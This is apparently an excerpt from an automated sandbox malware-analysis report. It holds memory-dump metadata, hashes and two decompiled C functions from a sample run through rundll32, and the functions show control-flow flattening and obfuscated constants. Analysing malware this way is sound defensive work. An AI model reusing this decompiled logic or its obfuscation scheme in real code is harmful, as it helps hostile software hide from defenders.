                                                                                                                      0x001896a1
                                                                                                                      0x00189860
                                                                                                                      0x00189860
                                                                                                                      0x001897ea
                                                                                                                      0x00189810
                                                                                                                      0x00189815
                                                                                                                      0x00189818
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: c$:Y($Qd$}Z$~4/$u
                                                                                                                      • API String ID: 0-1069939785
                                                                                                                      • Opcode ID: 3ff4209ff2e6c574366dc63adf6fab65c7ecd216403d93c311d74d7387cbf1a2
                                                                                                                      • Instruction ID: 1d2a4e1bd915da457d206a12f3797b96c0a008f252f032c57da11acf64866d0b
                                                                                                                      • Opcode Fuzzy Hash: 3ff4209ff2e6c574366dc63adf6fab65c7ecd216403d93c311d74d7387cbf1a2
                                                                                                                      • Instruction Fuzzy Hash: 86F101725083809FD369DF21C94AA9BBBF2FBC5748F10891DF19A96220D7B58509CF53
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 93%
                                                                                                                      			E00172830() {
                                                                                                                      				char _v520;
                                                                                                                      				char _v1040;
                                                                                                                      				signed int _v1044;
                                                                                                                      				signed int _v1048;
                                                                                                                      				intOrPtr _v1052;
                                                                                                                      				signed int _v1056;
                                                                                                                      				signed int _v1060;
                                                                                                                      				signed int _v1064;
                                                                                                                      				signed int _v1068;
                                                                                                                      				signed int _v1072;
                                                                                                                      				signed int _v1076;
                                                                                                                      				signed int _v1080;
                                                                                                                      				signed int _v1084;
                                                                                                                      				signed int _v1088;
                                                                                                                      				signed int _v1092;
                                                                                                                      				signed int _v1096;
                                                                                                                      				signed int _v1100;
                                                                                                                      				signed int _v1104;
                                                                                                                      				signed int _v1108;
                                                                                                                      				signed int _v1112;
                                                                                                                      				signed int _v1116;
                                                                                                                      				signed int _v1120;
                                                                                                                      				signed int _v1124;
                                                                                                                      				signed int _v1128;
                                                                                                                      				unsigned int _v1132;
                                                                                                                      				signed int _v1136;
                                                                                                                      				signed int _v1140;
                                                                                                                      				signed int _v1144;
                                                                                                                      				signed int _v1148;
                                                                                                                      				signed int _v1152;
                                                                                                                      				signed int _v1156;
                                                                                                                      				signed int _v1160;
                                                                                                                      				signed int _v1164;
                                                                                                                      				signed int _v1168;
                                                                                                                      				void* _t307;
                                                                                                                      				void* _t311;
                                                                                                                      				void* _t312;
                                                                                                                      				void* _t314;
                                                                                                                      				signed int _t317;
                                                                                                                      				signed int _t318;
                                                                                                                      				signed int _t319;
                                                                                                                      				signed int _t320;
                                                                                                                      				signed int _t321;
                                                                                                                      				signed int _t322;
                                                                                                                      				intOrPtr _t332;
                                                                                                                      				intOrPtr _t334;
                                                                                                                      				intOrPtr _t354;
                                                                                                                      				void* _t361;
                                                                                                                      				signed int* _t365;
                                                                                                                      
                                                                                                                      				_t365 =  &_v1168;
                                                                                                                      				_v1048 = _v1048 & 0x00000000;
                                                                                                                      				_v1044 = _v1044 & 0x00000000;
                                                                                                                      				_v1052 = 0xd27b82;
                                                                                                                      				_v1132 = 0xd68ad;
                                                                                                                      				_t317 = 0x39;
                                                                                                                      				_t361 = 0x31951cf;
                                                                                                                      				_v1132 = _v1132 / _t317;
                                                                                                                      				_v1132 = _v1132 | 0x7a114e95;
                                                                                                                      				_v1132 = _v1132 >> 9;
                                                                                                                      				_v1132 = _v1132 ^ 0x003f4f84;
                                                                                                                      				_v1164 = 0x8948b3;
                                                                                                                      				_v1164 = _v1164 + 0x5689;
                                                                                                                      				_v1164 = _v1164 + 0xffffbb3a;
                                                                                                                      				_t318 = 0x19;
                                                                                                                      				_v1164 = _v1164 * 0x56;
                                                                                                                      				_v1164 = _v1164 ^ 0x2e2b97d6;
                                                                                                                      				_v1072 = 0xcb9c2b;
                                                                                                                      				_v1072 = _v1072 >> 3;
                                                                                                                      				_v1072 = _v1072 ^ 0x001ca36a;
                                                                                                                      				_v1080 = 0x1dbdae;
                                                                                                                      				_v1080 = _v1080 >> 8;
                                                                                                                      				_v1080 = _v1080 ^ 0x00014686;
                                                                                                                      				_v1156 = 0xb5510a;
                                                                                                                      				_v1156 = _v1156 / _t318;
                                                                                                                      				_v1156 = _v1156 ^ 0xc10914df;
                                                                                                                      				_v1156 = _v1156 | 0x9ca0ebe9;
                                                                                                                      				_v1156 = _v1156 ^ 0xdda118ad;
                                                                                                                      				_v1104 = 0x66b826;
                                                                                                                      				_v1104 = _v1104 ^ 0xe9987981;
                                                                                                                      				_v1104 = _v1104 * 0x25;
                                                                                                                      				_v1104 = _v1104 ^ 0xd1d8b52b;
                                                                                                                      				_v1056 = 0xa9a3d5;
                                                                                                                      				_v1056 = _v1056 * 0x6e;
                                                                                                                      				_v1056 = _v1056 ^ 0x48e0209e;
                                                                                                                      				_v1064 = 0xff8e1d;
                                                                                                                      				_v1064 = _v1064 + 0x7d6c;
                                                                                                                      				_v1064 = _v1064 ^ 0x0102ce02;
                                                                                                                      				_v1060 = 0x1cd25;
                                                                                                                      				_v1060 = _v1060 >> 0xe;
                                                                                                                      				_v1060 = _v1060 ^ 0x00092955;
                                                                                                                      				_v1112 = 0x2e454b;
                                                                                                                      				_v1112 = _v1112 ^ 0xdfc484a9;
                                                                                                                      				_v1112 = _v1112 << 4;
                                                                                                                      				_v1112 = _v1112 ^ 0xfea80718;
                                                                                                                      				_v1084 = 0x44c343;
                                                                                                                      				_v1084 = _v1084 * 0x5e;
                                                                                                                      				_v1084 = _v1084 ^ 0x99776358;
                                                                                                                      				_v1084 = _v1084 ^ 0x804f0a92;
                                                                                                                      				_v1148 = 0xd43471;
                                                                                                                      				_v1148 = _v1148 << 0x10;
                                                                                                                      				_v1148 = _v1148 ^ 0xf30ce1ba;
                                                                                                                      				_v1148 = _v1148 | 0x5684f5e4;
                                                                                                                      				_v1148 = _v1148 ^ 0xd7f82c28;
                                                                                                                      				_v1140 = 0xc6d087;
                                                                                                                      				_v1140 = _v1140 * 0xf;
                                                                                                                      				_v1140 = _v1140 / _t318;
                                                                                                                      				_t319 = 0x11;
                                                                                                                      				_v1140 = _v1140 / _t319;
                                                                                                                      				_v1140 = _v1140 ^ 0x000f807a;
                                                                                                                      				_v1076 = 0xeb33ff;
                                                                                                                      				_v1076 = _v1076 | 0x3caa7413;
                                                                                                                      				_v1076 = _v1076 ^ 0x3ce1a50e;
                                                                                                                      				_v1160 = 0xf6df2e;
                                                                                                                      				_v1160 = _v1160 << 3;
                                                                                                                      				_t320 = 0x12;
                                                                                                                      				_v1160 = _v1160 / _t320;
                                                                                                                      				_t321 = 0x23;
                                                                                                                      				_v1160 = _v1160 / _t321;
                                                                                                                      				_v1160 = _v1160 ^ 0x0001c97f;
                                                                                                                      				_v1096 = 0x2990f1;
                                                                                                                      				_v1096 = _v1096 + 0x8b3d;
                                                                                                                      				_v1096 = _v1096 << 4;
                                                                                                                      				_v1096 = _v1096 ^ 0x02a87cfa;
                                                                                                                      				_v1168 = 0x9204f1;
                                                                                                                      				_v1168 = _v1168 << 2;
                                                                                                                      				_v1168 = _v1168 >> 0xe;
                                                                                                                      				_v1168 = _v1168 ^ 0x6a27e144;
                                                                                                                      				_v1168 = _v1168 ^ 0x6a24f645;
                                                                                                                      				_v1068 = 0x63146e;
                                                                                                                      				_v1068 = _v1068 + 0xffffb906;
                                                                                                                      				_v1068 = _v1068 ^ 0x00673218;
                                                                                                                      				_v1124 = 0xa7a9d5;
                                                                                                                      				_v1124 = _v1124 * 0x43;
                                                                                                                      				_v1124 = _v1124 + 0xa631;
                                                                                                                      				_v1124 = _v1124 ^ 0x2beabd88;
                                                                                                                      				_v1144 = 0x5bd0aa;
                                                                                                                      				_v1144 = _v1144 * 6;
                                                                                                                      				_v1144 = _v1144 | 0x1ea27ebc;
                                                                                                                      				_v1144 = _v1144 + 0xffff7d79;
                                                                                                                      				_v1144 = _v1144 ^ 0x1eab8d23;
                                                                                                                      				_v1152 = 0x75499f;
                                                                                                                      				_v1152 = _v1152 >> 7;
                                                                                                                      				_v1152 = _v1152 * 0x3b;
                                                                                                                      				_v1152 = _v1152 * 0x36;
                                                                                                                      				_v1152 = _v1152 ^ 0x0b6e0547;
                                                                                                                      				_v1116 = 0xfc11ad;
                                                                                                                      				_v1116 = _v1116 ^ 0xa8b58fc5;
                                                                                                                      				_v1116 = _v1116 * 0x46;
                                                                                                                      				_v1116 = _v1116 ^ 0x042cd8c8;
                                                                                                                      				_v1088 = 0x98b2ad;
                                                                                                                      				_v1088 = _v1088 + 0x5f8d;
                                                                                                                      				_v1088 = _v1088 << 8;
                                                                                                                      				_v1088 = _v1088 ^ 0x99161df3;
                                                                                                                      				_v1108 = 0xc44bb5;
                                                                                                                      				_v1108 = _v1108 + 0xffff808c;
                                                                                                                      				_v1108 = _v1108 ^ 0x7a0d028c;
                                                                                                                      				_v1108 = _v1108 ^ 0x7ac2537a;
                                                                                                                      				_v1128 = 0x834e58;
                                                                                                                      				_v1128 = _v1128 + 0xffff18d5;
                                                                                                                      				_v1128 = _v1128 << 0xe;
                                                                                                                      				_v1128 = _v1128 + 0xe46a;
                                                                                                                      				_v1128 = _v1128 ^ 0x99c7b134;
                                                                                                                      				_v1136 = 0xd0608e;
                                                                                                                      				_v1136 = _v1136 << 0xd;
                                                                                                                      				_v1136 = _v1136 ^ 0x0f37e4e4;
                                                                                                                      				_v1136 = _v1136 ^ 0x0bc0752d;
                                                                                                                      				_v1136 = _v1136 ^ 0x08ebd133;
                                                                                                                      				_v1120 = 0xe37477;
                                                                                                                      				_v1120 = _v1120 << 0xf;
                                                                                                                      				_v1120 = _v1120 << 0x10;
                                                                                                                      				_v1120 = _v1120 ^ 0x800d4304;
                                                                                                                      				_v1092 = 0xa7d287;
                                                                                                                      				_v1092 = _v1092 * 0x3e;
                                                                                                                      				_v1092 = _v1092 << 0xb;
                                                                                                                      				_v1092 = _v1092 ^ 0x27ebbc9f;
                                                                                                                      				_v1100 = 0xbdc4ed;
                                                                                                                      				_v1100 = _v1100 << 8;
                                                                                                                      				_t322 = 0x37;
                                                                                                                      				_v1100 = _v1100 / _t322;
                                                                                                                      				_v1100 = _v1100 ^ 0x03761b38;
                                                                                                                      				_t307 = E0019074A();
                                                                                                                      				do {
                                                                                                                      					while(_t361 != 0x31951cf) {
                                                                                                                      						if(_t361 == 0x3cad130) {
                                                                                                                      							_push( &_v1040);
                                                                                                                      							_push( &_v520);
                                                                                                                      							_push(_v1100);
                                                                                                                      							return E00178D95(_v1120, _v1092, __eflags);
                                                                                                                      						}
                                                                                                                      						if(_t361 == 0xac73e1e) {
                                                                                                                      							_push(_v1068);
                                                                                                                      							_push(_v1168);
                                                                                                                      							_push(0x17113c);
                                                                                                                      							_t311 = E0017AB66(_v1160, _v1096, __eflags);
                                                                                                                      							_t312 = E00175AE2(_v1124);
                                                                                                                      							_t354 =  *0x19520c; // 0x0
                                                                                                                      							_t266 = _t354 + 0x220; // 0x220
                                                                                                                      							_t268 = _t354 + 8; // 0x8
                                                                                                                      							E0018D37B(_t311, __eflags, _v1152, _t312, _t268, _v1116, _t268,  &_v520, _t266, _v1088);
                                                                                                                      							_t307 = E0017AE03(_v1108, _v1128, _v1136, _t311);
                                                                                                                      							_t365 =  &(_t365[0xd]);
                                                                                                                      							_t361 = 0x3cad130;
                                                                                                                      							continue;
                                                                                                                      						}
                                                                                                                      						_t373 = _t361 - 0xc947a3e;
                                                                                                                      						if(_t361 != 0xc947a3e) {
                                                                                                                      							goto L8;
                                                                                                                      						}
                                                                                                                      						_push(_v1104);
                                                                                                                      						_push(_v1156);
                                                                                                                      						_push(0x1710cc);
                                                                                                                      						_t314 = E0017AB66(_v1072, _v1080, _t373);
                                                                                                                      						_t332 =  *0x19520c; // 0x0
                                                                                                                      						_t334 =  *0x19520c; // 0x0
                                                                                                                      						E0017E7CE(_t314, _t373, _v1056, _t334 + 8, _t332 + 0x220, _v1064, _v1060, _v1112, _v1084, _t332 + 0x220);
                                                                                                                      						_t307 = E0017AE03(_v1148, _v1140, _v1076, _t314);
                                                                                                                      						_t365 =  &(_t365[0xd]);
                                                                                                                      						_t361 = 0xac73e1e;
                                                                                                                      					}
                                                                                                                      					_t361 = 0xc947a3e;
                                                                                                                      					L8:
                                                                                                                      					__eflags = _t361 - 0x9b97ca4;
                                                                                                                      				} while (__eflags != 0);
                                                                                                                      				return _t307;
                                                                                                                      			}

                                                                                                                      0x001729ef
                                                                                                                      0x001729fb
                                                                                                                      0x00172a03
                                                                                                                      0x00172a06
                                                                                                                      0x00172a0c
                                                                                                                      0x00172a14
                                                                                                                      0x00172a1c
                                                                                                                      0x00172a24
                                                                                                                      0x00172a2c
                                                                                                                      0x00172a34
                                                                                                                      0x00172a3f
                                                                                                                      0x00172a44
                                                                                                                      0x00172a4e
                                                                                                                      0x00172a51
                                                                                                                      0x00172a55
                                                                                                                      0x00172a5d
                                                                                                                      0x00172a65
                                                                                                                      0x00172a6d
                                                                                                                      0x00172a72
                                                                                                                      0x00172a7a
                                                                                                                      0x00172a82
                                                                                                                      0x00172a87
                                                                                                                      0x00172a8c
                                                                                                                      0x00172a94
                                                                                                                      0x00172a9c
                                                                                                                      0x00172aa4
                                                                                                                      0x00172aac
                                                                                                                      0x00172ab4
                                                                                                                      0x00172ac1
                                                                                                                      0x00172ac5
                                                                                                                      0x00172acd
                                                                                                                      0x00172ad5
                                                                                                                      0x00172ae2
                                                                                                                      0x00172ae6
                                                                                                                      0x00172aee
                                                                                                                      0x00172af6
                                                                                                                      0x00172afe
                                                                                                                      0x00172b06
                                                                                                                      0x00172b10
                                                                                                                      0x00172b19
                                                                                                                      0x00172b1d
                                                                                                                      0x00172b25
                                                                                                                      0x00172b2d
                                                                                                                      0x00172b3a
                                                                                                                      0x00172b3e
                                                                                                                      0x00172b46
                                                                                                                      0x00172b4e
                                                                                                                      0x00172b56
                                                                                                                      0x00172b5b
                                                                                                                      0x00172b63
                                                                                                                      0x00172b6b
                                                                                                                      0x00172b73
                                                                                                                      0x00172b7b
                                                                                                                      0x00172b83
                                                                                                                      0x00172b8b
                                                                                                                      0x00172b93
                                                                                                                      0x00172b98
                                                                                                                      0x00172ba0
                                                                                                                      0x00172ba8
                                                                                                                      0x00172bb0
                                                                                                                      0x00172bb5
                                                                                                                      0x00172bbd
                                                                                                                      0x00172bc5
                                                                                                                      0x00172bcd
                                                                                                                      0x00172bd5
                                                                                                                      0x00172bda
                                                                                                                      0x00172bdf
                                                                                                                      0x00172be7
                                                                                                                      0x00172bf4
                                                                                                                      0x00172bf8
                                                                                                                      0x00172bfd
                                                                                                                      0x00172c07
                                                                                                                      0x00172c0f
                                                                                                                      0x00172c1a
                                                                                                                      0x00172c1d
                                                                                                                      0x00172c21
                                                                                                                      0x00172c31
                                                                                                                      0x00172c45
                                                                                                                      0x00172c45
                                                                                                                      0x00172c53
                                                                                                                      0x00172d77
                                                                                                                      0x00172d7f
                                                                                                                      0x00172d80
                                                                                                                      0x00000000
                                                                                                                      0x00172d91
                                                                                                                      0x00172c5b
                                                                                                                      0x00172cea
                                                                                                                      0x00172cee
                                                                                                                      0x00172cfa
                                                                                                                      0x00172cff
                                                                                                                      0x00172d0d
                                                                                                                      0x00172d16
                                                                                                                      0x00172d1c
                                                                                                                      0x00172d2b
                                                                                                                      0x00172d3f
                                                                                                                      0x00172d51
                                                                                                                      0x00172d56
                                                                                                                      0x00172d59
                                                                                                                      0x00000000
                                                                                                                      0x00172d59
                                                                                                                      0x00172c61
                                                                                                                      0x00172c63
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00172c69
                                                                                                                      0x00172c6d
                                                                                                                      0x00172c79
                                                                                                                      0x00172c7e
                                                                                                                      0x00172c83
                                                                                                                      0x00172cae
                                                                                                                      0x00172cc6
                                                                                                                      0x00172cdb
                                                                                                                      0x00172ce0
                                                                                                                      0x00172ce3
                                                                                                                      0x00172ce3
                                                                                                                      0x00172d60
                                                                                                                      0x00172d62
                                                                                                                      0x00172d62
                                                                                                                      0x00172d62
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: D'j$KE.$U)$j$l}$wt
                                                                                                                      • API String ID: 0-3929749274
                                                                                                                      • Opcode ID: 78d63a4a5fe61b853d42ca7dbe84bde96b670821f03b31cd212a77c47b765099
                                                                                                                      • Instruction ID: 6ecfa3ba8ac9d7eefb754981c181d8738903df20fbce0e1c78311317d9130429
                                                                                                                      • Opcode Fuzzy Hash: 78d63a4a5fe61b853d42ca7dbe84bde96b670821f03b31cd212a77c47b765099
                                                                                                                      • Instruction Fuzzy Hash: 43D11FB15083809FC368CF65C58A51BFBF1FBD4748F508A1DF2AA96260D7B58949CF42
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 94%
                                                                                                                      			E0018129C(signed int* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                      				void* _v16;
                                                                                                                      				intOrPtr _v20;
                                                                                                                      				char _v68;
                                                                                                                      				signed int _v72;
                                                                                                                      				signed int _v76;
                                                                                                                      				signed int _v80;
                                                                                                                      				signed int _v84;
                                                                                                                      				signed int _v88;
                                                                                                                      				signed int _v92;
                                                                                                                      				signed int _v96;
                                                                                                                      				unsigned int _v100;
                                                                                                                      				signed int _v104;
                                                                                                                      				signed int _v108;
                                                                                                                      				signed int _v112;
                                                                                                                      				signed int _v116;
                                                                                                                      				signed int _v120;
                                                                                                                      				signed int _v124;
                                                                                                                      				signed int _v128;
                                                                                                                      				signed int _v132;
                                                                                                                      				signed int _v136;
                                                                                                                      				signed int _v140;
                                                                                                                      				signed int _v144;
                                                                                                                      				signed int _v148;
                                                                                                                      				signed int _v152;
                                                                                                                      				signed int _v156;
                                                                                                                      				signed int _v160;
                                                                                                                      				signed int _v164;
                                                                                                                      				void* _t225;
                                                                                                                      				signed int _t257;
                                                                                                                      				signed int* _t258;
                                                                                                                      				void* _t260;
                                                                                                                      				signed int _t295;
                                                                                                                      				signed int _t296;
                                                                                                                      				signed int _t297;
                                                                                                                      				signed int _t298;
                                                                                                                      				signed int _t299;
                                                                                                                      				signed int _t300;
                                                                                                                      				signed int* _t305;
                                                                                                                      				void* _t308;
                                                                                                                      
                                                                                                                      				_t302 = _a8;
                                                                                                                      				_t258 = __ecx;
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E0017CF25(_t225);
                                                                                                                      				_v20 = 0x578391;
                                                                                                                      				_t305 =  &(( &_v164)[4]);
                                                                                                                      				asm("stosd");
                                                                                                                      				_t260 = 0x3e847b6;
                                                                                                                      				asm("stosd");
                                                                                                                      				asm("stosd");
                                                                                                                      				_v136 = 0x7901e7;
                                                                                                                      				_v136 = _v136 ^ 0x0e05b978;
                                                                                                                      				_v136 = _v136 | 0x8500df2f;
                                                                                                                      				_v136 = _v136 ^ 0x8f7cffbf;
                                                                                                                      				_v72 = 0x5c6105;
                                                                                                                      				_v72 = _v72 ^ 0xba418fb0;
                                                                                                                      				_v72 = _v72 ^ 0xba16afcf;
                                                                                                                      				_v156 = 0xc57f64;
                                                                                                                      				_v156 = _v156 << 0xe;
                                                                                                                      				_v156 = _v156 | 0xac310e4c;
                                                                                                                      				_t295 = 0x48;
                                                                                                                      				_v156 = _v156 / _t295;
                                                                                                                      				_v156 = _v156 ^ 0x038a2108;
                                                                                                                      				_v100 = 0xf9dfe5;
                                                                                                                      				_v100 = _v100 >> 0xc;
                                                                                                                      				_v100 = _v100 ^ 0x0009d912;
                                                                                                                      				_v112 = 0xb5688b;
                                                                                                                      				_t296 = 0x3d;
                                                                                                                      				_v112 = _v112 / _t296;
                                                                                                                      				_v112 = _v112 ^ 0x00064c77;
                                                                                                                      				_v116 = 0x80f1cc;
                                                                                                                      				_v116 = _v116 + 0xfffff23f;
                                                                                                                      				_v116 = _v116 ^ 0x008ab174;
                                                                                                                      				_v92 = 0xc78857;
                                                                                                                      				_v92 = _v92 | 0x5f9c477c;
                                                                                                                      				_v92 = _v92 ^ 0x5fdf5dba;
                                                                                                                      				_v148 = 0x3d8773;
                                                                                                                      				_v148 = _v148 >> 0xa;
                                                                                                                      				_v148 = _v148 | 0x15c33ced;
                                                                                                                      				_v148 = _v148 + 0xffff6977;
                                                                                                                      				_v148 = _v148 ^ 0x15c9e03a;
                                                                                                                      				_v140 = 0x8050fd;
                                                                                                                      				_v140 = _v140 + 0xffffb165;
                                                                                                                      				_v140 = _v140 ^ 0xb13fe806;
                                                                                                                      				_v140 = _v140 ^ 0xb1b5a353;
                                                                                                                      				_v104 = 0x3fa35;
                                                                                                                      				_v104 = _v104 ^ 0x0635ab8b;
                                                                                                                      				_v104 = _v104 ^ 0x0638ddfb;
                                                                                                                      				_v128 = 0x6276d2;
                                                                                                                      				_v128 = _v128 * 0x67;
                                                                                                                      				_v128 = _v128 >> 7;
                                                                                                                      				_v128 = _v128 ^ 0x004624e6;
                                                                                                                      				_v84 = 0xb2127e;
                                                                                                                      				_v84 = _v84 ^ 0xdd4df2db;
                                                                                                                      				_v84 = _v84 ^ 0xddf0f9d7;
                                                                                                                      				_v108 = 0x825106;
                                                                                                                      				_v108 = _v108 + 0x54ee;
                                                                                                                      				_v108 = _v108 ^ 0x00831379;
                                                                                                                      				_v96 = 0x675ffa;
                                                                                                                      				_v96 = _v96 + 0xffff86b7;
                                                                                                                      				_v96 = _v96 ^ 0x0064c66c;
                                                                                                                      				_v132 = 0x78c111;
                                                                                                                      				_v132 = _v132 >> 0xb;
                                                                                                                      				_v132 = _v132 + 0xffff7c58;
                                                                                                                      				_v132 = _v132 ^ 0xfff3b3ba;
                                                                                                                      				_v164 = 0xbe0848;
                                                                                                                      				_t297 = 0x46;
                                                                                                                      				_v164 = _v164 / _t297;
                                                                                                                      				_v164 = _v164 << 4;
                                                                                                                      				_v164 = _v164 >> 5;
                                                                                                                      				_v164 = _v164 ^ 0x00009249;
                                                                                                                      				_v152 = 0xd46630;
                                                                                                                      				_v152 = _v152 | 0x25786146;
                                                                                                                      				_v152 = _v152 << 6;
                                                                                                                      				_t298 = 0x4f;
                                                                                                                      				_v152 = _v152 / _t298;
                                                                                                                      				_v152 = _v152 ^ 0x0191f926;
                                                                                                                      				_v144 = 0xf6674c;
                                                                                                                      				_v144 = _v144 >> 6;
                                                                                                                      				_v144 = _v144 ^ 0xb535724d;
                                                                                                                      				_v144 = _v144 ^ 0xb53e6a0f;
                                                                                                                      				_v160 = 0x2a1e3b;
                                                                                                                      				_v160 = _v160 >> 5;
                                                                                                                      				_t299 = 0x76;
                                                                                                                      				_v160 = _v160 / _t299;
                                                                                                                      				_v160 = _v160 << 7;
                                                                                                                      				_v160 = _v160 ^ 0x00046312;
                                                                                                                      				_v120 = 0xf44552;
                                                                                                                      				_v120 = _v120 + 0xbd95;
                                                                                                                      				_v120 = _v120 ^ 0x00f02cb9;
                                                                                                                      				_v76 = 0x9a2b11;
                                                                                                                      				_v76 = _v76 << 6;
                                                                                                                      				_v76 = _v76 ^ 0x2684a730;
                                                                                                                      				_v80 = 0x6aeef9;
                                                                                                                      				_t300 = 0x51;
                                                                                                                      				_v80 = _v80 / _t300;
                                                                                                                      				_v80 = _v80 ^ 0x000c464e;
                                                                                                                      				_v124 = 0x84a5f5;
                                                                                                                      				_v124 = _v124 << 5;
                                                                                                                      				_v124 = _v124 + 0xddfe;
                                                                                                                      				_v124 = _v124 ^ 0x10975fd7;
                                                                                                                      				_v88 = 0xa441a9;
                                                                                                                      				_v88 = _v88 + 0x5567;
                                                                                                                      				_v88 = _v88 ^ 0x00aef9b7;
                                                                                                                      				goto L1;
                                                                                                                      				do {
                                                                                                                      					while(1) {
                                                                                                                      						L1:
                                                                                                                      						_t308 = _t260 - 0x8801db7;
                                                                                                                      						if(_t308 > 0) {
                                                                                                                      							break;
                                                                                                                      						}
                                                                                                                      						if(_t308 == 0) {
                                                                                                                      							E0018F88F(_t302 + 0x1c,  &_v68, __eflags, _v80, _v124, _v88);
                                                                                                                      						} else {
                                                                                                                      							if(_t260 == 0x235eed) {
                                                                                                                      								E00184D91( *((intOrPtr*)(_t302 + 0x18)),  &_v68, _v164, _v152);
                                                                                                                      								_t305 =  &(_t305[2]);
                                                                                                                      								_t260 = 0x85d9450;
                                                                                                                      								continue;
                                                                                                                      							} else {
                                                                                                                      								if(_t260 == 0x3e847b6) {
                                                                                                                      									_t260 = 0xab5e479;
                                                                                                                      									 *_t258 =  *_t258 & 0x00000000;
                                                                                                                      									_t258[1] = _v136;
                                                                                                                      									continue;
                                                                                                                      								} else {
                                                                                                                      									if(_t260 == 0x6ea21eb) {
                                                                                                                      										E00184D91( *((intOrPtr*)(_t302 + 0x24)),  &_v68, _v84, _v108);
                                                                                                                      										_t305 =  &(_t305[2]);
                                                                                                                      										_t260 = 0x9265c01;
                                                                                                                      										continue;
                                                                                                                      									} else {
                                                                                                                      										if(_t260 == 0x80db57c) {
                                                                                                                      											E00184D91( *((intOrPtr*)(_t302 + 0x30)),  &_v68, _v120, _v76);
                                                                                                                      											_t305 =  &(_t305[2]);
                                                                                                                      											_t260 = 0x8801db7;
                                                                                                                      											continue;
                                                                                                                      										} else {
                                                                                                                      											if(_t260 != 0x85d9450) {
                                                                                                                      												goto L24;
                                                                                                                      											} else {
                                                                                                                      												E00184D91( *((intOrPtr*)(_t302 + 0x38)),  &_v68, _v144, _v160);
                                                                                                                      												_t305 =  &(_t305[2]);
                                                                                                                      												_t260 = 0x80db57c;
                                                                                                                      												continue;
                                                                                                                      											}
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						L27:
                                                                                                                      						__eflags =  *_t258;
                                                                                                                      						_t224 =  *_t258 != 0;
                                                                                                                      						__eflags = _t224;
                                                                                                                      						return 0 | _t224;
                                                                                                                      					}
                                                                                                                      					__eflags = _t260 - 0x9265c01;
                                                                                                                      					if(_t260 == 0x9265c01) {
                                                                                                                      						E00184D91( *((intOrPtr*)(_t302 + 0x34)),  &_v68, _v96, _v132);
                                                                                                                      						_t305 =  &(_t305[2]);
                                                                                                                      						_t260 = 0x235eed;
                                                                                                                      						goto L24;
                                                                                                                      					} else {
                                                                                                                      						__eflags = _t260 - 0xa20e3fb;
                                                                                                                      						if(__eflags == 0) {
                                                                                                                      							E0018F88F(_t302 + 8,  &_v68, __eflags, _v140, _v104, _v128);
                                                                                                                      							_t305 =  &(_t305[3]);
                                                                                                                      							_t260 = 0x6ea21eb;
                                                                                                                      							goto L1;
                                                                                                                      						} else {
                                                                                                                      							__eflags = _t260 - 0xab5e479;
                                                                                                                      							if(_t260 == 0xab5e479) {
                                                                                                                      								_t258[1] = E0019146E(_t302);
                                                                                                                      								_t260 = 0xffaf556;
                                                                                                                      								goto L1;
                                                                                                                      							} else {
                                                                                                                      								__eflags = _t260 - 0xf4853c6;
                                                                                                                      								if(_t260 == 0xf4853c6) {
                                                                                                                      									E001864C5(_v112, _v116, _v92, _v148, _t258,  &_v68);
                                                                                                                      									_t305 =  &(_t305[4]);
                                                                                                                      									_t260 = 0xa20e3fb;
                                                                                                                      									goto L1;
                                                                                                                      								} else {
                                                                                                                      									__eflags = _t260 - 0xffaf556;
                                                                                                                      									if(_t260 != 0xffaf556) {
                                                                                                                      										goto L24;
                                                                                                                      									} else {
                                                                                                                      										_push(_t260);
                                                                                                                      										_push(_t260);
                                                                                                                      										_t257 = E00183512(_t258[1]);
                                                                                                                      										 *_t258 = _t257;
                                                                                                                      										__eflags = _t257;
                                                                                                                      										if(__eflags != 0) {
                                                                                                                      											_t260 = 0xf4853c6;
                                                                                                                      											goto L1;
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      					}
                                                                                                                      					goto L27;
                                                                                                                      					L24:
                                                                                                                      					__eflags = _t260 - 0x1d5478a;
                                                                                                                      				} while (__eflags != 0);
                                                                                                                      				goto L27;
                                                                                                                      			}










































                                                                                                                      0x001814af
                                                                                                                      0x001814b7
                                                                                                                      0x001814bf
                                                                                                                      0x001814c7
                                                                                                                      0x001814d0
                                                                                                                      0x001814d5
                                                                                                                      0x001814db
                                                                                                                      0x001814e3
                                                                                                                      0x001814eb
                                                                                                                      0x001814f0
                                                                                                                      0x001814f8
                                                                                                                      0x00181500
                                                                                                                      0x00181508
                                                                                                                      0x00181511
                                                                                                                      0x00181516
                                                                                                                      0x0018151c
                                                                                                                      0x00181521
                                                                                                                      0x00181529
                                                                                                                      0x00181531
                                                                                                                      0x00181539
